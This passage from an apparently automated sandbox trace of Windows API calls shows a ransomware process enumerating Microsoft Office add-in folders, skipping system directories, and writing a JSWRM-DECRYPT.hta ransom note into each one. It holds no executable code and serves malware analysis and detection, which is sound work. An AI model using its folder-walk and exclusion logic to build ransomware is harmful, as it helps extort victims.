lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.429] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc6040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 0 [0123.429] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0123.429] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x453c2a7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x453c2a7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="tr", cAlternateFileName="")) returned 1 [0123.429] lstrcmpiW (lpString1="tr", lpString2=".") returned 1 [0123.429] lstrcmpiW (lpString1="tr", lpString2="..") returned 1 [0123.429] lstrcmpiW (lpString1="tr", lpString2="...") returned 1 [0123.429] lstrcmpiW (lpString1="tr", lpString2="windows") returned -1 [0123.429] lstrcmpiW (lpString1="tr", lpString2="recovery") returned 1 [0123.429] lstrcmpiW (lpString1="tr", lpString2="perflogs") returned 1 [0123.429] lstrcmpiW (lpString1="tr", lpString2="documents and settings") returned 1 [0123.429] lstrcmpiW (lpString1="tr", lpString2="$RECYCLE.BIN") returned 1 [0123.429] lstrcmpiW (lpString1="tr", lpString2="system volume information") returned 1 [0123.429] lstrcmpiW (lpString1="tr", lpString2="msocache") returned 1 [0123.429] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\tr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\tr\\jswrm-decrypt.hta")) returned 0xffffffff [0123.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\tr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\tr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.431] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.431] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.432] CloseHandle (hObject=0x338) returned 1 [0123.432] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\tr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\tr\\jswrm-decrypt.hta")) returned 0x20 [0123.432] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\tr\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x453c2a7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x403b09e2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0123.432] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.432] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x453c2a7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x403b09e2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.432] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.432] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.432] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x403b09e2, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x403b09e2, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x403b09e2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.432] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.432] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.432] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.432] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.432] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.433] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.433] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.433] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.433] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.433] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.433] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa8eba59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa911c96, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.433] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.433] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.433] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.433] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.433] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.433] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.433] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.433] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.433] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.433] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.433] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x402b37e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x402b37e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4110038, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x26aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.433] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.433] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.433] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.433] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.434] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb8b74ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb8b74ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb8b74ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x31aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.434] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d298, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.434] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x453c2a7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x453c2a7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x456248c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.434] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.434] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.434] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.434] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.435] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.435] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.435] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.435] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.435] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.435] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.435] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x453c2a7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x453c2a7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x456248c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 0 [0123.435] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0123.435] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd8e49f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x37f90ac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37f90ac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="uk", cAlternateFileName="")) returned 1 [0123.435] lstrcmpiW (lpString1="uk", lpString2=".") returned 1 [0123.435] lstrcmpiW (lpString1="uk", lpString2="..") returned 1 [0123.435] lstrcmpiW (lpString1="uk", lpString2="...") returned 1 [0123.435] lstrcmpiW (lpString1="uk", lpString2="windows") returned -1 [0123.435] lstrcmpiW (lpString1="uk", lpString2="recovery") returned 1 [0123.435] lstrcmpiW (lpString1="uk", lpString2="perflogs") returned 1 [0123.435] lstrcmpiW (lpString1="uk", lpString2="documents and settings") returned 1 [0123.435] lstrcmpiW (lpString1="uk", lpString2="$RECYCLE.BIN") returned 1 [0123.435] lstrcmpiW (lpString1="uk", lpString2="system volume information") returned 1 [0123.435] lstrcmpiW (lpString1="uk", lpString2="msocache") returned 1 [0123.435] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\jswrm-decrypt.hta")) returned 0xffffffff [0123.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.439] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.440] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.440] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.441] CloseHandle (hObject=0x338) returned 1 [0123.442] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\jswrm-decrypt.hta")) returned 0x20 [0123.442] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd8e49f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x37f90ac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x403d6a08, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0123.442] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.442] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd8e49f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x37f90ac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x403d6a08, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.442] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.442] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.442] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x403d6a08, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x403d6a08, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x403d6a08, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, 